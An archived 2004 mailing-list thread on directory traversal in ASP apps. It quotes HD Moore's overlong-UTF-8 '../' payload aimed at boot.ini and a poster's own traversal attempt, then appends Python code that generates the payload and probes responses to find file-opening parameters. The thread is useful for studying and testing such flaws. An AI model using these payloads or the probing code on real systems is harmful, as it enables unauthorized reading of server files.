Re: info on dir traversal techniques, any?

From: Chan Fook Sheng (chanfooksheng@pacific.net.sg)
Date: Thu May 06 2004 - 03:44:56 EDT


I assume you are using Unicode UTF-8, right?

I tried
http://client/file.asp?File=../../../../../../../../../winnt/system32/vga.drv
system.drv

but I still got a normal page with no content in the main frame. I use
Paros proxy, and I can't see any error pages in the HTTP response at all;
all requests are answered with HTTP 200 OK.

It seems to me there is no sure way to know if they are using
FileSystemObject or not, am I right? What I can do is to try all
possible techniques, and if there is no positive results, I should look
for something more interesting, am I right to say that?

"files which contain bytes that are illegal in a file name" care to quote some examples?

H D Moore wrote:

>On Monday 03 May 2004 06:16, Chan Fook Sheng wrote:
>
>
>>I am trying to get the application to display any files on the
>>filesystem. I have tried appending %00 etc., but to no avail.
>>Anyone knows of more techniques to try?
>>
>>
>
>For ASP scripts that pass user input directly into the FileSystemObject,
>you can use Unicode tricks to perform a directory traversal. The nice
>thing about this attack is that there is no easy defense in the ASP
>language; Microsoft's own "secure" ShowCode.asp was vulnerable to this
>type of flaw. A sample traversal would look like:
>
>somebustedcode.asp?mahfile=%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afboot.ini
>
>
>
>>How can one determine whether a web application is opening files for
>>read, hence making it possible for directory traversal attack?
>>
>>
>
>Try passing a variety of invalid names and look for a difference in the
>returned error message. Using file names with reserved device names may
>return a non-standard response, same goes for files which contain bytes
>that are illegal in a file name...
>
>-HD
>
>
>------------------------------------------------------------------------------
>Ethical Hacking at the InfoSec Institute. Mention this ad and get $545 off
>any course! All of our class sizes are guaranteed to be 10 students or less
>to facilitate one-on-one interaction with one of our expert instructors.
>Attend a course taught by an expert instructor with years of in-the-field
>pen testing experience in our state of the art hacking lab. Master the skills
>of an Ethical Hacker to better assess the security of your organization.
>Visit us at:
>http://www.infosecinstitute.com/courses/ethical_hacking_training.html
>-------------------------------------------------------------------------------
>
>

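The two techniques discussed in this thread, as an added example that is not part of either poster's message: the overlong-UTF-8 encoding of `../` that HD Moore's sample URL uses, why a string-match filter on the raw parameter never sees it, and the differential probing (reserved device names, illegal file-name bytes, NUL) he suggests for telling whether a parameter reaches a file-open call. The lenient decoder below is a model of a permissive legacy decoder, not any specific server's code; a conforming UTF-8 decoder rejects overlong forms, which the `strict_decode_rejects` check shows. All function names are hypothetical and the sample responses are constructed, not captured from a real application.

```python
import hashlib
import urllib.parse

# --- 1. Overlong UTF-8 traversal (the %c0%ae%c0%af trick) -----------------

def overlong_2byte(ch: str) -> bytes:
    """Encode an ASCII character in the (invalid) two-byte UTF-8 form
    110xxxxx 10xxxxxx. '.' (0x2E) becomes C0 AE, '/' (0x2F) becomes C0 AF."""
    cp = ord(ch)
    if cp >= 0x80:
        raise ValueError("only ASCII has a two-byte overlong form here")
    return bytes([0xC0 | (cp >> 6), 0x80 | (cp & 0x3F)])

def overlong_traversal(depth: int, target: str) -> str:
    """'../' repeated `depth` times in overlong UTF-8, percent-encoded,
    followed by the target file name (matches the shape of HD's sample)."""
    dotdotslash = overlong_2byte(".") * 2 + overlong_2byte("/")
    return "".join("%%%02x" % b for b in dotdotslash * depth) + target

def naive_filter_blocks(param: str) -> bool:
    """A typical string-match filter on the raw parameter. It never sees
    '../' because the bytes only become dots and slashes after a lenient
    UTF-8 decode further down the stack."""
    return "../" in param or "..\\" in param

def lenient_utf8_decode(raw: bytes) -> str:
    """Decode two-byte UTF-8 sequences WITHOUT rejecting overlong forms,
    modelling a permissive legacy decoder (assumption, not a specific
    product). A conforming decoder must refuse these sequences."""
    out, i = [], 0
    while i < len(raw):
        b = raw[i]
        if b < 0x80:
            out.append(chr(b)); i += 1
        elif 0xC0 <= b < 0xE0 and i + 1 < len(raw):
            out.append(chr(((b & 0x1F) << 6) | (raw[i + 1] & 0x3F))); i += 2
        else:
            out.append("\ufffd"); i += 1
    return "".join(out)

def decode_as_lenient_server(percent_encoded: str) -> str:
    """URL-decode, then decode leniently: the path the file API would open."""
    return lenient_utf8_decode(urllib.parse.unquote_to_bytes(percent_encoded))

def strict_decode_rejects(percent_encoded: str) -> bool:
    """True if a conforming UTF-8 decoder (Python's) refuses the bytes."""
    try:
        urllib.parse.unquote_to_bytes(percent_encoded).decode("utf-8")
        return False
    except UnicodeDecodeError:
        return True

# --- 2. Differential probing for a file-opening parameter ------------------

RESERVED_DEVICE_NAMES = ["CON", "PRN", "AUX", "NUL", "COM1", "LPT1"]
ILLEGAL_NAME_CHARS = '<>:"|?*'   # illegal in Windows file names

def fingerprint_probes(baseline: str) -> dict:
    """Values to send in the file parameter, keyed by label. 'missing' yields
    the generic not-found response that the other probes are compared to."""
    probes = {"baseline": baseline, "missing": "nonexistent_" + baseline}
    for dev in RESERVED_DEVICE_NAMES:
        probes["device_" + dev] = dev
    for ch in ILLEGAL_NAME_CHARS:
        probes["illegal_%02x" % ord(ch)] = urllib.parse.quote(baseline + ch, safe="")
    probes["nul_byte"] = baseline + "%00"
    probes["overlong"] = overlong_traversal(5, "boot.ini")
    return probes

def response_fingerprint(status: int, body: bytes) -> tuple:
    """Status alone is useless when everything is 200 OK; include the body."""
    return (status, len(body), hashlib.sha1(body).hexdigest()[:8])

def interesting(responses: dict) -> list:
    """Labels whose response differs from both the normal page and the
    generic not-found page: candidates for a real file-open code path."""
    base = response_fingerprint(*responses["baseline"])
    miss = response_fingerprint(*responses["missing"])
    return sorted(name for name, (status, body) in responses.items()
                  if response_fingerprint(status, body) not in (base, miss))

# Constructed sample responses (not real server output): every request is
# 200 OK, and only the reserved device name produces a distinguishable body.
SAMPLE_RESPONSES = {
    "baseline":   (200, b"<html><frame>report contents</frame></html>"),
    "missing":    (200, b"<html><frame></frame></html>"),
    "illegal_3c": (200, b"<html><frame></frame></html>"),
    "nul_byte":   (200, b"<html><frame></frame></html>"),
    "device_CON": (200, b"<html>runtime error: bad file name or number</html>"),
}

if __name__ == "__main__":
    payload = overlong_traversal(5, "boot.ini")
    print(payload)
    print("naive filter blocks it:", naive_filter_blocks(payload))
    print("lenient server opens:", decode_as_lenient_server(payload))
    print("strict decoder rejects:", strict_decode_rejects(payload))
    print("interesting probes:", interesting(SAMPLE_RESPONSES))
```

When every response is 200 OK, as in the original poster's case, the comparison has to be on the body (length and hash here), and a probe is only interesting if it differs from both the normal page and the plain not-found page; a device name or illegal byte that triggers a different error than a missing file is the signal that the parameter reaches a file-open call.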



This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:53:53 EDT